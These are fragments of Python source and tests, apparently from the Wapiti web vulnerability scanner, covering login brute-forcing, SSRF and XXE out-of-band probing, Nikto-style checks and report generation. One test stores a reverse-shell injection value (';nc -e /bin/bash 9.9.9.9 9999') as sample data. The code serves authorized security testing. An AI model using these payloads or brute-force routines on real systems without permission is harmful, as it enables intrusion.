>= 1: print("[+] {}".format(original_request)) attack_module.attack(original_request) if (datetime.utcnow() - start).total_seconds() > self._max_attack_time >= 1: print(_("Max attack time was reached for module {0}, stopping.".format(attack_module.name))) break except KeyboardInterrupt as exception: print('') print(_("Attack process was interrupted. Do you want to:")) print(_("\tr) stop everything here and generate the (R)eport")) print(_("\tn) move to the (N)ext attack module (if any)")) print(_("\tq) (Q)uit without generating the report")) print(_("\tc) (C)ontinue the current attack")) while True: try: answer = input("? ").strip().lower() except UnicodeDecodeError: pass if answer not in ("r", "n", "q", "c"): print(_("Invalid choice. Valid choices are r, n, q and c.")) else: break if answer in ("r", "n"): break if answer == "c": continue # if answer is q, raise KeyboardInterrupt and it will stop cleanly raise exception except RequestException: # Hmmm it should be caught inside the module sleep(1) continue except StopIteration: break except Exception as exception: # Catch every possible exceptions and print it exception_traceback = sys.exc_info()[2] print(exception.__class__.__name__, exception) print_tb(exception_traceback) if self._bug_report: traceback_file = str(uuid1()) with open(traceback_file, "w") as traceback_fd: print_tb(exception_traceback, file=traceback_fd) print("{}: {}".format(exception.__class__.__name__, exception), file=traceback_fd) print("Occurred in {} on {}".format(attack_module.name, self.target_url), file=traceback_fd) print("{}. Requests {}. OS {}".format(WAPITI_VERSION, requests.__version__, sys.platform)) try: upload_request = Request( "https://wapiti3.ovh/upload.php", file_params=[["crash_report", [traceback_file, open(traceback_file, "rb").read()]]] ) page = self.crawler.send(upload_request) print(_("Sending crash report {} ... {}").format(traceback_file, page.content)) except RequestException: print(_("Error sending crash report")) os.unlink(traceback_file) else: if original_request.path_id is not None: self.persister.set_attacked(original_request.path_id, attack_module.name) if hasattr(attack_module, "finish"): attack_module.finish() if attack_module.network_errors: print(_("{} requests were skipped due to network issues").format(attack_module.network_errors)) if answer == "1": break # if self.crawler.get_uploads(): # print('') # print(_("Upload scripts found:")) # print("----------------------") # for upload_form in self.crawler.get_uploads(): # print(upload_form) if not self.output_file: if self.report_generator_type == "html": self.output_file = self.COPY_REPORT_DIR else: filename = "{}_{}".format( self.server.replace(":", "_"), strftime("%m%d%Y_%H%M", self.report_gen.scan_date) ) self.output_file = filename + "." + self.report_generator_type for payload in self.persister.get_payloads(): if payload.type == "vulnerability": self.report_gen.add_vulnerability( category=payload.category, level=payload.level, request=payload.evil_request, parameter=payload.parameter, info=payload.info ) elif payload.type == "anomaly": self.report_gen.add_anomaly( category=payload.category, level=payload.level, request=payload.evil_request, parameter=payload.parameter, info=payload.info ) elif payload.type == "additional": self.report_gen.add_additional( category=payload.category, level=payload.level, request=payload.evil_request, parameter=payload.parameter, info=payload.info ) self.report_gen.generate_report(self.output_file) print('') print(_("Report")) print("------") print(_("A report has been generated in the file {0}").format(self.output_file)) if self.report_generator_type == "html": print(_("Open {0} with a browser to see this report.").format(self.report_gen.final_path))
def attack(self): http_resources = self.persister.get_links( attack_module=self.name) if self.do_get else [] forms = self.persister.get_forms( attack_module=self.name) if self.do_post else [] for original_request in chain(http_resources, forms): # We leverage the fact that the crawler will fill password entries with a known placeholder if "Letm3in_" not in (original_request.encoded_data + original_request.encoded_params): continue # We may want to remove this but if not available fallback to target URL if not original_request.referer: continue if self.verbose >= 1: print("[+] {}".format(original_request)) request = Request(original_request.referer) page = self.crawler.get(request, follow_redirects=True) login_form, username_field_idx, password_field_idx = page.find_login_form( ) if not login_form: continue failure_text = self.test_credentials(login_form, username_field_idx, password_field_idx, "invalid", "invalid") if self.check_success_auth(failure_text): # Ignore this case as it raise false positives continue for username, password in product(self.get_usernames(), self.get_passwords()): response = self.test_credentials(login_form, username_field_idx, password_field_idx, username, password) if self.check_success_auth( response) and failure_text != response: vuln_message = _( "Credentials found for URL {} : {} / {}").format( original_request.referer, username, password) # Recreate the request that succeed in order to print and store it post_params = login_form.post_params get_params = login_form.get_params if login_form.method == "POST": post_params[username_field_idx][1] = username post_params[password_field_idx][1] = password else: get_params[username_field_idx][1] = username get_params[password_field_idx][1] = password evil_request = web.Request( path=login_form.url, method=login_form.method, post_params=post_params, get_params=get_params, referer=login_form.referer, link_depth=login_form.link_depth) self.add_vuln(request_id=original_request.path_id, category=NAME, level=HIGH_LEVEL, request=evil_request, info=vuln_message) self.log_red("---") self.log_red(vuln_message), self.log_red(Messages.MSG_EVIL_REQUEST) self.log_red(evil_request.http_repr()) self.log_red("---") break yield original_request
def test_reports(): for report_format, report_class in GENERATORS.items(): report_gen = report_class() report_gen.set_report_info( "http://perdu.com", "folder", gmtime(), "WAPITI_VERSION", { "method": "post", "url": "http://testphp.vulnweb.com/login.php", "logged_in": True, "form": { "login_field": "uname", "password_field": "pass" } }, 123456) for vul in vulnerabilities: report_gen.add_vulnerability_type( vul.NAME, vul.DESCRIPTION, vul.SOLUTION, flatten_references(vul.REFERENCES)) for anomaly in anomalies: report_gen.add_anomaly_type(anomaly.NAME, anomaly.DESCRIPTION, anomaly.SOLUTION, flatten_references(anomaly.REFERENCES)) for additional in additionals: report_gen.add_additional_type( additional.NAME, additional.DESCRIPTION, additional.SOLUTION, flatten_references(additional.REFERENCES)) if report_format == "html": temp_obj = tempfile.TemporaryDirectory() else: temp_obj = tempfile.NamedTemporaryFile(delete=False) output = temp_obj.name print("Using report type '{}'".format(report_format)) request = Request("http://perdu.com/riri?foo=bar") report_gen.add_vulnerability( category=_("Reflected Cross Site Scripting"), level=1, request=request, parameter="foo", info="This is dope", module="xss") request = Request("http://perdu.com/fifi?foo=bar") report_gen.add_anomaly(category=_("Internal Server Error"), level=2, request=request, parameter="foo", info="This is the way", module="xss") request = Request("http://perdu.com/?foo=bar") report_gen.add_additional(category=_("Fingerprint web technology"), level=3, request=request, parameter="foo", info="loulou", module="wapp") report_gen.generate_report(output) if report_format == "html": output = report_gen.final_path with open(output) as fd: report = fd.read() assert "riri" in report assert "fifi" in report assert "loulou" in report assert "http://testphp.vulnweb.com/login.php" in report assert "uname" in report assert "pass" in report # the csv report only contains vulnerabilities without the info section if report_format != "csv": assert "123456" in report
async def process_line(self, line): match = match_or = match_and = False fail = fail_or = False osv_id = line[1] path = line[3] method = line[4] vuln_desc = line[10] post_data = line[11] path = path.replace("@CGIDIRS", "/cgi-bin/") path = path.replace("@ADMIN", "/admin/") path = path.replace("@NUKE", "/modules/") path = path.replace("@PHPMYADMIN", "/phpMyAdmin/") path = path.replace("@POSTNUKE", "/postnuke/") path = re.sub(r"JUNK\((\d+)\)", lambda x: self.junk_string[:int(x.group(1))], path) if path[0] == "@": return if not path.startswith("/"): path = "/" + path try: url = f"{self.parts.scheme}://{self.parts.netloc}{path}" except UnicodeDecodeError: return if method == "GET": evil_request = Request(url) elif method == "POST": evil_request = Request(url, post_params=post_data, method=method) else: evil_request = Request(url, post_params=post_data, method=method) if method == "GET": log_verbose(f"[¨] {evil_request.url}") else: log_verbose(f"[¨] {evil_request.http_repr()}") try: response = await self.crawler.async_send(evil_request) page = response.content code = response.status except (RequestError, ConnectionResetError): self.network_errors += 1 return except Exception as exception: logging.warning(f"{exception} occurred with URL {evil_request.url}") return raw = " ".join([x + ": " + y for x, y in response.headers.items()]) raw += page # See https://github.com/sullo/nikto/blob/master/program/plugins/nikto_tests.plugin for reference expected_status_codes = [] # First condition (match) if len(line[5]) == 3 and line[5].isdigit(): expected_status_code = int(line[5]) expected_status_codes.append(expected_status_code) if code == expected_status_code: match = True else: if line[5] in raw: match = True # Second condition (or) if line[6] != "": if len(line[6]) == 3 and line[6].isdigit(): expected_status_code = int(line[6]) expected_status_codes.append(expected_status_code) if code == expected_status_code: match_or = True else: if line[6] in raw: match_or = True # Third condition (and) if line[7] != "": if len(line[7]) == 3 and line[7].isdigit(): if code == int(line[7]): match_and = True else: if line[7] in raw: match_and = True else: match_and = True # Fourth condition (fail) if line[8] != "": if len(line[8]) == 3 and line[8].isdigit(): if code == int(line[8]): fail = True else: if line[8] in raw: fail = True # Fifth condition (or) if line[9] != "": if len(line[9]) == 3 and line[9].isdigit(): if code == int(line[9]): fail_or = True else: if line[9] in raw: fail_or = True if ((match or match_or) and match_and) and not (fail or fail_or): if expected_status_codes: if await self.is_false_positive(evil_request, expected_status_codes): return log_red("---") log_red(vuln_desc) log_red(url) refs = [] if osv_id != "0": refs.append("https://vulners.com/osvdb/OSVDB:" + osv_id) # CERT cert_advisory = re.search("(CA-[0-9]{4}-[0-9]{2})", vuln_desc) if cert_advisory is not None: refs.append("http://www.cert.org/advisories/" + cert_advisory.group(0) + ".html") # SecurityFocus securityfocus_bid = re.search("BID-([0-9]{4})", vuln_desc) if securityfocus_bid is not None: refs.append("http://www.securityfocus.com/bid/" + securityfocus_bid.group(1)) # Mitre.org mitre_cve = re.search("((CVE|CAN)-[0-9]{4}-[0-9]{4,})", vuln_desc) if mitre_cve is not None: refs.append("http://cve.mitre.org/cgi-bin/cvename.cgi?name=" + mitre_cve.group(0)) # CERT Incidents cert_incident = re.search("(IN-[0-9]{4}-[0-9]{2})", vuln_desc) if cert_incident is not None: refs.append("http://www.cert.org/incident_notes/" + cert_incident.group(0) + ".html") # Microsoft Technet ms_bulletin = re.search("(MS[0-9]{2}-[0-9]{3})", vuln_desc) if ms_bulletin is not None: refs.append("http://www.microsoft.com/technet/security/bulletin/" + ms_bulletin.group(0) + ".asp") info = vuln_desc if refs: log_red(_("References:")) log_red(" " + "\n ".join(refs)) info += "\n" + _("References:") + "\n" info += "\n".join(refs) log_red("---") await self.add_vuln_high( category=NAME, request=evil_request, info=info, wstg=WSTG_CODE )
async def test_request_object(): res1 = Request("http://httpbin.org/post?var1=a&var2=b", post_params=[['post1', 'c'], ['post2', 'd']]) res2 = Request("http://httpbin.org/post?var1=a&var2=z", post_params=[['post1', 'c'], ['post2', 'd']]) res3 = Request("http://httpbin.org/post?var1=a&var2=b", post_params=[['post1', 'c'], ['post2', 'z']]) res4 = Request("http://httpbin.org/post?var1=a&var2=b", post_params=[['post1', 'c'], ['post2', 'd']]) res5 = Request("http://httpbin.org/post?var1=z&var2=b", post_params=[['post1', 'c'], ['post2', 'd']]) res6 = Request("http://httpbin.org/post?var3=z&var2=b", post_params=[['post1', 'c'], ['post2', 'd']]) res7 = Request("http://httpbin.org/post?var1=z&var2=b&var4=e", post_params=[['post1', 'c'], ['post2', 'd']]) res8 = Request("http://httpbin.org/post?var2=d&var1=z", post_params=[['post1', 'c'], ['post2', 'd']]) res10 = Request("http://httpbin.org/post?qs0", post_params=[['post1', 'c'], ['post2', 'd']]) res11 = Request("http://httpbin.org/post?qs1", post_params=[['post1', 'c'], ['post2', 'd']]) res12 = Request("http://httpbin.org/post?qs1", post_params=[['post1', 'c'], ['post2', 'd']], file_params=[['file1', ('fname1', 'content')], ['file2', ('fname2', 'content')]]) res13 = Request("https://www.youtube.com/user/OneMinuteSilenceBand/videos") res14 = Request("https://www.youtube.com/user/OneMinuteSilenceBand/") res15 = Request("https://duckduckgo.com/") res16 = Request("https://duckduckgo.com/", post_params=[['q', 'Kung Fury']]) res17 = Request("http://example.com:8080/dir/?x=3") res18 = Request("http://httpbin.org/get?a=1", get_params=[['get1', 'c'], ['get2', 'd']]) assert res1 < res2 assert res2 > res3 assert res1 < res3 assert res1 == res4 assert hash(res1) == hash(res4) res4.link_depth = 5 assert hash(res1) == hash(res4) assert res1 != res2 assert res2 >= res1 assert res1 <= res3 assert res13.file_name == "videos" assert res10.path == "http://httpbin.org/post" assert res10.file_name == "post" # This one is important as it could break attacks on query string assert res10.url == "http://httpbin.org/post?qs0" assert res13.parent_dir == res14.url assert res15.is_root assert res15.parent_dir == res15.url assert res13.dir_name == res14.url assert res14.dir_name == res14.url assert res15.dir_name == res15.url assert res15 != res16 query_list = [res15] assert res16 not in query_list assert res17.dir_name == "http://example.com:8080/dir/" assert res18.url == "http://httpbin.org/get?get1=c&get2=d" assert res17.hostname == "example.com:8080" assert res1.encoded_get_keys == res8.encoded_get_keys assert res17.encoded_get_keys == "x" assert res16.encoded_get_keys == "" assert res12.parameters_count == 5 assert res12.encoded_get_keys == "qs1" assert res5.hash_params == res8.hash_params assert res7.hash_params != res8.hash_params assert res6 in [res6, res11] assert res6 not in [res11, None] assert res11 in [res6, res11] assert res11 not in [None, res6] print("Tests were successful, now launching representations") print("=== Basic representation follows ===") print(res1) print("=== cURL representation follows ===") print(res1.curl_repr) print("=== HTTP representation follows ===") print(res1.http_repr()) print("=== POST parameters as an array ===") print(res1.post_params) print("=== POST keys encoded as string ===") print(res1.encoded_post_keys) print("=== Upload HTTP representation ===") print(res12.http_repr()) print("=== Upload basic representation ===") print(res12) print("=== Upload cURL representation ===") print(res12.curl_repr) print("=== HTTP GET keys as a tuple ===") print(res1.get_keys) print("=== HTTP POST keys as a tuple ===") print(res1.post_keys) print("=== HTTP files keys as a tuple ===") print(res12.file_keys) print('') json_req = Request("http://httpbin.org/post?a=b", post_params=json.dumps({ "z": 1, "a": 2 }), enctype="application/json") crawler = AsyncCrawler("http://httpbin.org/") page = await crawler.async_send(json_req) assert page.json["json"] == {"z": 1, "a": 2} assert page.json["headers"]["Content-Type"] == "application/json" assert page.json["form"] == {} page = await crawler.async_send(res12) assert page.json["files"] res19 = Request("http://httpbin.org/post?qs1", post_params=[['post1', 'c'], ['post2', 'd']], file_params=[['file1', ('fname1', 'content')], ['file2', ('fname2', 'content')]], enctype="multipart/form-data") page = await crawler.async_send(res19) assert page.json["files"] await crawler.close()
async def _dump_url_content_to_file(self, url: str, file_path: str): request = Request(url) response = await self.crawler.async_send(request) with open(file_path, 'w', encoding='utf-8') as file: json.dump(response.json, file)
def test_plugin(): #Response to tell that Wordpress is used responses.add( responses.GET, url="http://perdu.com/", body= "<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \ <h2>Pas de panique, on va wordpress vous aider</h2> \ Wordpress wordpress WordPress\ <strong><pre> * <----- vous êtes ici</pre></strong></body></html>" ) #Response for versioned plugin responses.add( responses.GET, url="http://perdu.com/wp-content/plugins/bbpress/readme.txt", body= "<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \ <h2>Pas de panique, on va wordpress vous aider</h2> \ Wordpress wordpress WordPress\ Stable tag: 2.6.6 \ <strong><pre> * <----- vous êtes ici</pre></strong></body></html>" ) #Response for plugin detected without version (403 forbiden response) responses.add( responses.GET, url="http://perdu.com/wp-content/plugins/wp-reset/readme.txt", body= "<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \ <h2>Pas de panique, on va wordpress vous aider</h2> \ Wordpress wordpress WordPress\ Stable tag: 9.5.1 \ <strong><pre> * <----- vous êtes ici</pre></strong></body></html>", status=403) #Response for bad format readme.txt of plugin responses.add( responses.GET, url="http://perdu.com/wp-content/plugins/unyson/readme.txt", body= "<html><head><title>Vous Etes Perdu ?</title></head><body><h1>Perdu sur l'Internet ?</h1> \ <h2>Pas de panique, on va wordpress vous aider</h2> \ Wordpress wordpress WordPress\ Version Tested : 4.5 \ <strong><pre> * <----- vous êtes ici</pre></strong></body></html>" ) responses.add( responses.GET, url=re.compile(r"http://perdu.com/wp-content/plugins/.*?/readme.txt"), status=404) responses.add( responses.GET, url=re.compile(r"http://perdu.com/wp-content/themes/.*?/readme.txt"), status=404) persister = FakePersister() request = Request("http://perdu.com") request.path_id = 1 crawler = Crawler("http://perdu.com") options = {"timeout": 10, "level": 2} logger = Mock() module = mod_wp_enum(crawler, persister, logger, options) module.verbose = 2 module.attack(request) assert persister.additionals assert persister.additionals[ 0] == '{"name": "bbpress", "versions": ["2.6.6"], "categories": ["WordPress plugins"]}' assert persister.additionals[ 1] == '{"name": "wp-reset", "versions": [""], "categories": ["WordPress plugins"]}' assert persister.additionals[ 2] == '{"name": "unyson", "versions": [""], "categories": ["WordPress plugins"]}'
async def attack(self, request: Request): self.finished = True request_to_root = Request(request.url) categories_file_path = os.path.join(self.user_config_dir, self.WAPP_CATEGORIES) groups_file_path = os.path.join(self.user_config_dir, self.WAPP_GROUPS) technologies_file_path = os.path.join(self.user_config_dir, self.WAPP_TECHNOLOGIES) await self._verify_wapp_database(categories_file_path, technologies_file_path, groups_file_path) try: application_data = ApplicationData(categories_file_path, groups_file_path, technologies_file_path) except FileNotFoundError as exception: logging.error(exception) logging.error( _("Try using --store-session option, or update apps.json using --update option." )) return except ApplicationDataException as exception: logging.error(exception) return detected_applications = await self._detect_applications( request.url, application_data) if len(detected_applications) > 0: log_blue("---") for application_name in sorted(detected_applications, key=lambda x: x.lower()): versions = detected_applications[application_name]["versions"] categories = detected_applications[application_name]["categories"] groups = detected_applications[application_name]["groups"] log_blue(MSG_TECHNO_VERSIONED, application_name, versions) log_blue(MSG_CATEGORIES, categories) log_blue(MSG_GROUPS, groups) log_blue("") await self.add_addition( category=TECHNO_DETECTED, request=request_to_root, info=json.dumps(detected_applications[application_name]), wstg=TECHNO_DETECTED_WSTG_CODE) if versions: if "Web servers" in categories: await self.add_vuln_info( category=WEB_SERVER_VERSIONED, request=request_to_root, info=json.dumps( detected_applications[application_name]), wstg=WEB_SERVER_WSTG_CODE) else: await self.add_vuln_info( category=WEB_APP_VERSIONED, request=request_to_root, info=json.dumps( detected_applications[application_name]), wstg=WEB_APP_WSTG_CODE)
def mutate(self, request: Request): get_params = request.get_params post_params = request.post_params file_params = request.file_params referer = request.referer # estimation = self.estimate_requests_count(request) # # if self._attacks_per_url_pattern[request.hash_params] + estimation > self._max_queries_per_pattern: # # Otherwise (pattern already attacked), make sure we don't exceed maximum allowed # return # # self._attacks_per_url_pattern[request.hash_params] += estimation for params_list in [get_params, post_params, file_params]: for i in range(len(params_list)): param_name = quote(params_list[i][0]) if self._skip_list and param_name in self._skip_list: continue if self._parameters and param_name not in self._parameters: continue saved_value = params_list[i][1] if saved_value is None: saved_value = "" if params_list is file_params: params_list[i][1] = ["__PAYLOAD__", params_list[i][1][1]] else: params_list[i][1] = "__PAYLOAD__" attack_pattern = Request(request.path, method=request.method, get_params=get_params, post_params=post_params, file_params=file_params) if hash(attack_pattern) not in self._attack_hashes: self._attack_hashes.add(hash(attack_pattern)) payload = SSRF_PAYLOAD.format( external_endpoint=self._endpoint, random_id=self._session_id, path_id=request.path_id, hex_param=hexlify( param_name.encode("utf-8", errors="replace")).decode()) flags = set() if params_list is file_params: params_list[i][1][0] = payload flags.add(PayloadType.file) else: params_list[i][1] = payload if params_list is get_params: flags.add(PayloadType.get) else: flags.add(PayloadType.post) evil_req = Request(request.path, method=request.method, get_params=get_params, post_params=post_params, file_params=file_params, referer=referer, link_depth=request.link_depth) yield evil_req, param_name, payload, flags params_list[i][1] = saved_value if not get_params and request.method == "GET" and self._qs_inject: attack_pattern = Request("{}?__PAYLOAD__".format(request.path), method=request.method, referer=referer, link_depth=request.link_depth) if hash(attack_pattern) not in self._attack_hashes: self._attack_hashes.add(hash(attack_pattern)) flags = set() payload = SSRF_PAYLOAD.format( external_endpoint=self._endpoint, random_id=self._session_id, path_id=request.path_id, hex_param=hexlify(b"QUERY_STRING").decode()) evil_req = Request("{}?{}".format(request.path, quote(payload)), method=request.method, referer=referer, link_depth=request.link_depth) flags.add(PayloadType.get) yield evil_req, "QUERY_STRING", payload, flags
async def test_persister_upload(): try: os.unlink("/tmp/crawl.db") except FileNotFoundError: pass persister = SqlPersister("/tmp/crawl.db") await persister.create() await persister.set_root_url("http://httpbin.org/") simple_upload = Request( "http://httpbin.org/post?qs1", post_params=[["post1", "c"], ["post2", "d"]], file_params=[["file1", ("'fname1", b"content", "text/plain")], ["file2", ("fname2", b"content", "text/plain")]]) xml_upload = Request("http://httpbin.org/post?qs1", post_params=[["post1", "c"], ["post2", "d"]], file_params=[[ "calendar", ("calendar.xml", b"<xml>Hello there</xml>", "application/xml") ]]) await persister.save_request(simple_upload) await persister.save_request(xml_upload) assert await persister.count_paths() == 2 stored_requests = set([__ async for __ in persister.get_to_browse()]) assert simple_upload in stored_requests assert xml_upload in stored_requests respx.post("http://httpbin.org/post?qs1").mock( return_value=httpx.Response(200, text="Hello there")) crawler = AsyncCrawler(Request("http://httpbin.org/")) for req in stored_requests: await crawler.async_send(req) await persister.save_request(req) if req == simple_upload: assert req.file_params == simple_upload.file_params assert req.file_params[0] == [ "file1", ("'fname1", b"content", "text/plain") ] assert req.file_params[1] == [ "file2", ("fname2", b"content", "text/plain") ] else: assert req.file_params == xml_upload.file_params assert req.file_params[0] == [ "calendar", ("calendar.xml", b"<xml>Hello there</xml>", "application/xml") ] naughty_file = Request("http://httpbin.org/post?qs1", post_params=[["post1", "c"], ["post2", "d"]], file_params=[[ "calendar", ("calendar.xml", b"<xml>XXE there</xml>", "application/xml") ]]) await persister.add_payload( 1, # request_id "vulnerability", # payload_type "exec", # module "Command Execution", # category 1, # level naughty_file, # request "calendar", # parameter "<xml>XXE there</xml>" # info ) payload = [__ async for __ in persister.get_payloads()][0] assert naughty_file == payload.evil_request assert payload.parameter == "calendar" assert len([ __ async for __ in persister.get_forms(path="http://httpbin.org/post") ]) == 2 await crawler.close()
async def finish(self): endpoint_url = "{}get_xxe.php?session_id={}".format(self.internal_endpoint, self._session_id) print(_("[*] Asking endpoint URL {} for results, please wait...").format(endpoint_url)) await sleep(2) # A la fin des attaques on questionne le endpoint pour savoir s'il a été contacté endpoint_request = Request(endpoint_url) try: response = await self.crawler.async_send(endpoint_request) except RequestError: self.network_errors += 1 print(_("[!] Unable to request endpoint URL '{}'").format(self.internal_endpoint)) return data = response.json if not isinstance(data, dict): return for request_id in data: original_request = self.persister.get_path_by_id(request_id) if original_request is None: continue # raise ValueError("Could not find the original request with ID {}".format(request_id)) page = original_request.path for hex_param in data[request_id]: parameter = unhexlify(hex_param).decode("utf-8") for infos in data[request_id][hex_param]: request_url = infos["url"] # Date in ISO format request_date = infos["date"] request_ip = infos["ip"] request_size = infos["size"] payload_name = infos["payload"] if parameter == "QUERY_STRING": vuln_message = Messages.MSG_QS_INJECT.format(self.MSG_VULN, page) elif parameter == "raw body": vuln_message = _( "Out-Of-Band {0} by sending raw XML in request body" ).format( self.MSG_VULN ) else: vuln_message = _( "Out-Of-Band {0} via injection in the parameter {1}" ).format( self.MSG_VULN, parameter ) more_infos = _( "The target sent {0} bytes of data to the endpoint at {1} with IP {2}.\n" "Received data can be seen at {3}." ).format( request_size, request_date, request_ip, request_url ) vuln_message += "\n" + more_infos # placeholder if shit happens payload = ( "<xml>" "See https://phonexicum.github.io/infosec/xxe.html#attack-vectors" "</xml>" ) for payload, _flags in self.payloads: if "{}.dtd".format(payload_name) in payload: payload = payload.replace("[PATH_ID]", str(original_request.path_id)) payload = payload.replace("[PARAM_AS_HEX]", "72617720626f6479") break if parameter == "raw body": mutated_request = Request( original_request.path, method="POST", enctype="text/xml", post_params=payload ) elif parameter == "QUERY_STRING": mutated_request = Request( "{}?{}".format(original_request.path, quote(payload)), method="GET" ) elif parameter in original_request.get_keys or parameter in original_request.post_keys: mutator = Mutator( methods="G" if original_request.method == "GET" else "P", payloads=[(payload, Flags())], qs_inject=self.must_attack_query_string, parameters=[parameter], skip=self.options.get("skipped_parameters") ) mutated_request, __, __, __ = next(mutator.mutate(original_request)) else: mutator = FileMutator( payloads=[(payload, Flags())], parameters=[parameter], skip=self.options.get("skipped_parameters") ) mutated_request, __, __, __ = next(mutator.mutate(original_request)) self.add_vuln( request_id=original_request.path_id, category=NAME, level=HIGH_LEVEL, request=mutated_request, info=vuln_message, parameter=parameter ) self.log_red("---") self.log_red(vuln_message) self.log_red(Messages.MSG_EVIL_REQUEST) self.log_red(mutated_request.http_repr()) self.log_red("---")
async def test_persister_basic(): url = "http://httpbin.org/?k=v" respx.get(url).mock(return_value=httpx.Response(200, text="Hello world!")) crawler = AsyncCrawler("http://httpbin.org/") try: os.unlink("/tmp/crawl.db") except FileNotFoundError: pass persister = SqlitePersister("/tmp/crawl.db") persister.set_root_url("http://httpbin.org/") simple_get = Request("http://httpbin.org/?k=v") simple_post = Request( "http://httpbin.org/post?var1=a&var2=b", post_params=[["post1", "c"], ["post2", "d"]] ) persister.set_to_browse([simple_get, simple_post]) assert persister.get_root_url() == "http://httpbin.org/" assert persister.count_paths() == 2 assert not len(list(persister.get_links())) assert not len(list(persister.get_forms())) assert not len(list(persister.get_payloads())) stored_requests = set(persister.get_to_browse()) assert simple_get in stored_requests assert simple_post in stored_requests # If there is some requests stored then it means scan was started assert persister.has_scan_started() assert not persister.has_scan_finished() assert not persister.have_attacks_started() for req in stored_requests: if req == simple_get: await crawler.async_send(req) # Add the sent request persister.add_request(req) assert req.path_id == 1 assert persister.get_path_by_id(1) == req break # Should be one now as the link was crawled assert len(list(persister.get_links())) == 1 # We still have two entries in paths though as the resource just got updated assert persister.count_paths() == 2 persister.set_attacked(1, "xss") assert persister.count_attacked("xss") == 1 assert persister.have_attacks_started() naughty_get = Request("http://httpbin.org/?k=1%20%OR%200") persister.add_vulnerability(1, "SQL Injection", 1, naughty_get, "k", "OR bypass") assert next(persister.get_payloads()) persister.flush_attacks() assert not persister.have_attacks_started() assert not len(list(persister.get_payloads())) persister.flush_session() assert not persister.count_paths() naughty_post = Request( "http://httpbin.org/post?var1=a&var2=b", post_params=[["post1", "c"], ["post2", ";nc -e /bin/bash 9.9.9.9 9999"]] ) persister.add_vulnerability(1, "Command Execution", 1, naughty_post, "post2", ";nc -e /bin/bash 9.9.9.9 9999") payload = next(persister.get_payloads()) persister.close() assert naughty_post == payload.evil_request assert payload.parameter == "post2" await crawler.close()
if "[TIMEOUT]" in clean_line: flag_type = PayloadType.time clean_line = clean_line.replace("[TIMEOUT]", "") clean_line = clean_line.replace("\\0", "\0") return clean_line, Flags(type=flag_type) if __name__ == "__main__": mutator = Mutator(payloads=[("INJECT", Flags()), ("ATTACK", Flags())], qs_inject=True, max_queries_per_pattern=16) res1 = Request("http://httpbin.org/post?var1=a&var2=b", post_params=[['post1', 'c'], ['post2', 'd']]) res2 = Request("http://httpbin.org/post?var1=a&var2=z", post_params=[['post1', 'c'], ['post2', 'd']]) res3 = Request("http://httpbin.org/get?login=admin&password=letmein", ) assert res1.hash_params == res2.hash_params for evil_request, param_name, payload, flags in mutator.mutate(res1): print(evil_request) print(flags) print('') print("#" * 50) print('')
def attack(self): methods = "" if self.do_get: methods += "G" if self.do_post: methods += "PF" mutator = SsrfMutator(session_id=self._session_id, methods=methods, payloads=self.payloads, qs_inject=self.must_attack_query_string, skip=self.options.get("skipped_parameters")) http_resources = self.persister.get_links( attack_module=self.name) if self.do_get else [] forms = self.persister.get_forms( attack_module=self.name) if self.do_post else [] for original_request in chain(http_resources, forms): if self.verbose >= 1: print("[+] {}".format(original_request)) # Let's just send payloads, we don't care of the response as what we want to know is if the target # contacted the endpoint. for mutated_request, parameter, payload, flags in mutator.mutate( original_request): try: if self.verbose == 2: print("[¨] {0}".format(mutated_request)) try: self.crawler.send(mutated_request) except ReadTimeout: continue except (KeyboardInterrupt, RequestException) as exception: yield exception yield original_request # A la fin des attaques on questionne le endpoint pour savoir s'il a été contacté endpoint_request = Request( "https://wapiti3.ovh/get_ssrf.php?id={}".format(self._session_id)) try: response = self.crawler.send(endpoint_request) except ReadTimeout: pass else: data = response.json if isinstance(data, dict): for request_id in data: original_request = self.persister.get_path_by_id( request_id) if not original_request: raise ValueError( "Could not find the original request with that ID") page = original_request.path for hex_param in data[request_id]: parameter = unhexlify(hex_param).decode("utf-8") for infos in data[request_id][hex_param]: request_url = infos["url"] # Date in ISO format request_date = infos["date"] request_ip = infos["ip"] request_method = infos["method"] # request_size = infos["size"] if parameter == "QUERY_STRING": vuln_message = Vulnerability.MSG_QS_INJECT.format( self.MSG_VULN, page) else: vuln_message = _( "{0} via injection in the parameter {1}.\n" "The target performed an outgoing HTTP {2} request at {3} with IP {4}.\n" "Full request can be seen at {5}").format( self.MSG_VULN, parameter, request_method, request_date, request_ip, request_url) mutator = Mutator( methods="G" if original_request.method == "GET" else "P", payloads=[("http://external.url/page", set())], qs_inject=self.must_attack_query_string, skip=self.options.get("skipped_parameters")) mutated_request, parameter, taint, flags = next( mutator.mutate(original_request)) self.add_vuln(request_id=original_request.path_id, category=Vulnerability.SSRF, level=Vulnerability.HIGH_LEVEL, request=mutated_request, info=vuln_message, parameter=parameter) self.log_red("---") self.log_red( Vulnerability.MSG_QS_INJECT if parameter == "QUERY_STRING" else Vulnerability.MSG_PARAM_INJECT, self.MSG_VULN, page, parameter) self.log_red(Vulnerability.MSG_EVIL_REQUEST) self.log_red(mutated_request.http_repr()) self.log_red("---")
def getcookie_main(): parser = argparse.ArgumentParser(description="Wapiti-getcookie: An utility to grab cookies from a webpage") parser.add_argument( '-u', '--url', help='First page to fetch for cookies', required=True ) parser.add_argument( '-c', '--cookie', help='Cookie file in Wapiti JSON format where cookies will be stored', required=True ) parser.add_argument( '-p', '--proxy', help='Address of the proxy server to use' ) parser.add_argument( '-d', '--data', help='Data to send to the form with POST' ) args = parser.parse_args() parts = urlparse(args.url) if not parts.scheme or not parts.netloc or not parts.path: print(_("Invalid base URL was specified, please give a complete URL with protocol scheme" " and slash after the domain name.")) exit() server = parts.netloc base = urlunparse((parts.scheme, parts.netloc, parts.path, '', '', '')) crawler = Crawler(base) if args.proxy: proxy_parts = urlparse(args.proxy) if proxy_parts.scheme and proxy_parts.netloc: if proxy_parts.scheme.lower() in ("http", "https", "socks"): crawler.set_proxy(args.proxy) # Open or create the cookie file and delete previous cookies from this server jc = jsoncookie.JsonCookie() jc.open(args.cookie) jc.delete(server) page = crawler.get(Request(args.url), follow_redirects=True) # A first crawl is sometimes necessary, so let's fetch the webpage jc.addcookies(crawler.session_cookies) if not args.data: # Not data specified, try interactive mode by fetching forms forms = [] for i, form in enumerate(page.iter_forms(autofill=False)): if i == 0: print('') print(_("Choose the form you want to use or enter 'q' to leave :")) 